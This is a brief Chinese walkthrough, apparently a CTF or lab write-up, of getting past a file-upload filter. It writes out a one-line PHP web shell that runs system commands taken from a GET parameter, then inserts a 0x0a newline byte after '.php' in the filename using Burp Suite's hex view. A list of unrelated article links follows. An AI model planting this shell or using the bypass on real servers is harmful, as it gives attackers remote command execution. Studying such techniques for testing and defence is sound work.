Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
wenzhangli71 小时前
Scene与Group机制答疑:深入理解ooderAI Agent协作框架_0341 小时前
ensp-mpls2云川之下1 小时前
【网络】广播地址工作原理(arp不受广播地址影响)数字芯片实验室1 小时前
IP验证最终回归到时序级建模kida_yuan2 小时前
【Linux】文件系统与 fsck.ext4 修复 - 我踩过的坑与总结tobias.b3 小时前
408真题解析-2009-33-网络-OSI模型米高梅狮子3 小时前
01. 配置DHCP服务器这儿有一堆花3 小时前
CDN 工作原理:空间换取时间的网络架构徐子元竟然被占了!!3 小时前
常用端口学习爱蛙科技3 小时前
近红外应用 | 通过光谱分析,360°测试鉴定苹果